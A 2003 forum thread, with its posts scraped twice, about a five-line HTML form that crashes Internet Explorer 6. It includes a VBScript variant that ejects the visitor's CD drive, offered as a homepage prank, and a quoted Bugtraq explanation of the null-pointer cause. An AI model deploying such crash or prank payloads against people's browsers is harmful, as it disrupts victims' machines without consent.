Gotta love IE... - Tilted Forum Project Discussion Community

urbandev · 05-08-2003, 01:34 PM

Lovely little IE fuck up...
CODE

this will crash IE 6+

edit: look a few posts down for the HTML which will crash IE

gamer715 · 05-08-2003, 01:37 PM

I'm running IE 6 and all i see it a blank text entry box...

i'd like to see this work though it would be a great prank, set that as someones homepage and presto!

platypus · 05-08-2003, 01:45 PM

Not sure what code is in your box, but these 5 lines will crash IE6.
I left off the <'s and you can basically replace the word 'crash' with any unrecognized word.

html>
form>
input type crash>
/form>
/html>

thecow · 05-08-2003, 02:38 PM

Quote:

Originally posted by platypus
Not sure what code is in your box, but these 5 lines will crash IE6.
I left off the <'s and you can basically replace the word 'crash' with any unrecognized word.

html>
form>
input type crash>
/form>
/html>

Man, you weren't kidding. Took my work comp a few minutes to choke through the errors. My comp science teachers are always telling me to expect bad input from users, guess nobody up in redmond heard that advise before,

.

gamer715 · 05-08-2003, 02:57 PM

Heh, combine this with the CD-drive open file and you get a CD-Opening, IE-Crashing home page... beginning carets removed of course...

Code:

html>
SCRIPT language=VBScript>
(PUTAOPENCARETHERE)!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection


if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
--(PUTACLOSECARETHERE)
/SCRIPT>
form>
input type crash>
/form>
/html>

Of course, replace the (PUTAOPENCARETHERE) and (PUTACLOSECARETTHERE) appropriately...

Or, to download this little bugger or see it live:
click here, or right click there and hit save target as to save.

juanvaldes · 05-08-2003, 03:28 PM

now now, it's not there fault they use what's default. And no warning == bad mojo.

charliex · 05-08-2003, 03:36 PM

hmm i tried the link on my ie gamer, didn't do anything cept pop out the cd and show a text box, which i entered text into
ie6 2800 sp2 xp, no crashes.

gamer715 · 05-08-2003, 05:07 PM

charlie, link's fixed now. 50megs was messing it up, had to move it to brinkster. please note that it won't close IE altogether, just the window it's trying to open in...

urbandev · 05-08-2003, 10:02 PM

it only works(that ive seen) on IE6.0+

charliex · 05-09-2003, 08:43 PM

yep, that err fixed it , crashed alright.

buqtraq info. just for the heck of it ->

IE tries to compare the type of the input field to "HIDDEN", to see if it
should be rendered. When there is no type string, a null-pointer is used.

mshtml.dll calls shlwapi.dll#158 @ 0x636f0037 with a pointer to a static
unicode string "HIDDEN" and a null-pointer.
shlwapi.dll#158 does a case-insensitive comparison of two unicode strings:
it reads from address 0x0 because of the null-pointer and thus causes an
exception.
This is not exploitable, other then a DoS because there is no memory mapped
@ 0x0 and even if you could load something there, you could only compare it
to "HIDDEN" which gets you nowhere.

Berend-Jan Wever
----

luckily you can just exit out of that function with a debugger

05-08-2003, 01:34 PM	#1 (permalink)
urbandev Insane Location: Dayton, NV	Gotta love IE... Lovely little IE fuck up... CODE this will crash IE 6+ edit: look a few posts down for the HTML which will crash IE Last edited by juanvaldes; 05-08-2003 at 03:24 PM..

05-08-2003, 01:37 PM	#2 (permalink)
gamer715 Insane Location: here	I'm running IE 6 and all i see it a blank text entry box... i'd like to see this work though it would be a great prank, set that as someones homepage and presto! __________________ What 'chu talkin' 'bout, Willis?

05-08-2003, 01:45 PM	#3 (permalink)
platypus Essen meine kurze Hosen Location: NY Burbs	Not sure what code is in your box, but these 5 lines will crash IE6. I left off the <'s and you can basically replace the word 'crash' with any unrecognized word. html> form> input type crash> /form> /html> __________________ Out the 10Base-T, through the router, down the T1, over the leased line, off the bridge, past the firewall...nothing but Net.

05-08-2003, 02:57 PM	#5 (permalink)
gamer715 Insane Location: here	Heh, combine this with the CD-drive open file and you get a CD-Opening, IE-Crashing home page... beginning carets removed of course... Code: html> SCRIPT language=VBScript> (PUTAOPENCARETHERE)!-- Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom End If --(PUTACLOSECARETHERE) /SCRIPT> form> input type crash> /form> /html> Of course, replace the (PUTAOPENCARETHERE) and (PUTACLOSECARETTHERE) appropriately... Or, to download this little bugger or see it live: click here, or right click there and hit save target as to save. __________________ What 'chu talkin' 'bout, Willis? Last edited by gamer715; 05-08-2003 at 05:07 PM..

05-08-2003, 05:07 PM	#8 (permalink)
gamer715 Insane Location: here	charlie, link's fixed now. 50megs was messing it up, had to move it to brinkster. please note that it won't close IE altogether, just the window it's trying to open in... __________________ What 'chu talkin' 'bout, Willis?

05-08-2003, 03:28 PM	#6 (permalink)
juanvaldes Banned Location: shittown, CA	now now, it's not there fault they use what's default. And no warning == bad mojo.

05-08-2003, 03:36 PM	#7 (permalink)
charliex Junkie Location: North Hollywood	hmm i tried the link on my ie gamer, didn't do anything cept pop out the cd and show a text box, which i entered text into ie6 2800 sp2 xp, no crashes.

05-08-2003, 10:02 PM	#9 (permalink)
urbandev Insane Location: Dayton, NV	it only works(that ive seen) on IE6.0+ __________________ Raoul Duke: "I wouldn't dare go to sleep with you wandering around with a head full of acid, wanting to slice me up with that goddamn knife." Dr. Gonzo: "Who said anything about slicing you up, man. I just wanted to cut a little Z in your forehead."

05-09-2003, 08:43 PM	#10 (permalink)
charliex Junkie Location: North Hollywood	yep, that err fixed it , crashed alright. buqtraq info. just for the heck of it -> IE tries to compare the type of the input field to "HIDDEN", to see if it should be rendered. When there is no type string, a null-pointer is used. mshtml.dll calls shlwapi.dll#158 @ 0x636f0037 with a pointer to a static unicode string "HIDDEN" and a null-pointer. shlwapi.dll#158 does a case-insensitive comparison of two unicode strings: it reads from address 0x0 because of the null-pointer and thus causes an exception. This is not exploitable, other then a DoS because there is no memory mapped @ 0x0 and even if you could load something there, you could only compare it to "HIDDEN" which gets you nowhere. Berend-Jan Wever ---- luckily you can just exit out of that function with a debugger